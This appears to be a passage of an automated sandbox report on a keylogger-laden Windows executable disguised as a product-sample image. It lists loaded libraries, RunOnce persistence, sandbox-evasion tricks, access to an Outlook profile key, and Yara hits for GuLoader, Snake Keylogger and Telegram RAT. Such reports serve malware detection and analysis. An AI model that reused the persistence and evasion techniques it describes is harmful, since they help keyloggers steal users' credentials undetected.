                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                Source: jazy.lnk.0.drLNK file: ..\..\Documents\skinder.mun
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Binary string: mshtml.pdb source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: _.pdb source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035965000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17883981680.0000000004770000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mshtml.pdbUGP source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmp

                Data Obfuscation

                barindex
                Yara detected GuLoader
                Source: Yara matchFile source: 00000000.00000002.17886564519.0000000008520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00405EA7 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EA7
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_10002CE0 push eax; ret 0_2_10002D0E
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3736F7B9 push ecx; retf 2_2_3736F7C4
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D259A push edx; iretd 2_2_373D259B
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3741EC84 push ss; iretd 2_2_3741EC85
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile created: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dllJump to dropped file
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile created: C:\Users\user\AppData\Roaming\stub\Sophia.exeJump to dropped file
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fileJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fileJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fileJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fileJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Opens the same file many times (likely Sandbox evasion)
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Program Files (x86)\Common Files\mastens\topnotcher.epi count: 73505Jump to behavior
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeAPI/Special instruction interceptor: Address: 88DE5AA
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeAPI/Special instruction interceptor: Address: 39CE5AA
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeMemory allocated: 34920000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeMemory allocated: 34750000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dllJump to dropped file
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe TID: 2928Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe TID: 2928Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00405459 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_00405459
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00405E80 FindFirstFileA,FindClose,0_2_00405E80
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_0040264F FindFirstFileA,0_2_0040264F
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.00000000046EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW"@
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.00000000046EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.00000000046A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@co
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeAPI call chain: ExitProcess graph end nodegraph_0-4156
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeAPI call chain: ExitProcess graph end nodegraph_0-4298
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00405859 LdrInitializeThunk,GetTickCount,GetTempFileNameA,0_2_00405859
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00405EA7 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EA7
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess created: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00405B9E GetVersion,LdrInitializeThunk,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B9E
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Drawing_Products_Materials_and_Samples_IMG.exe PID: 3392, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPE
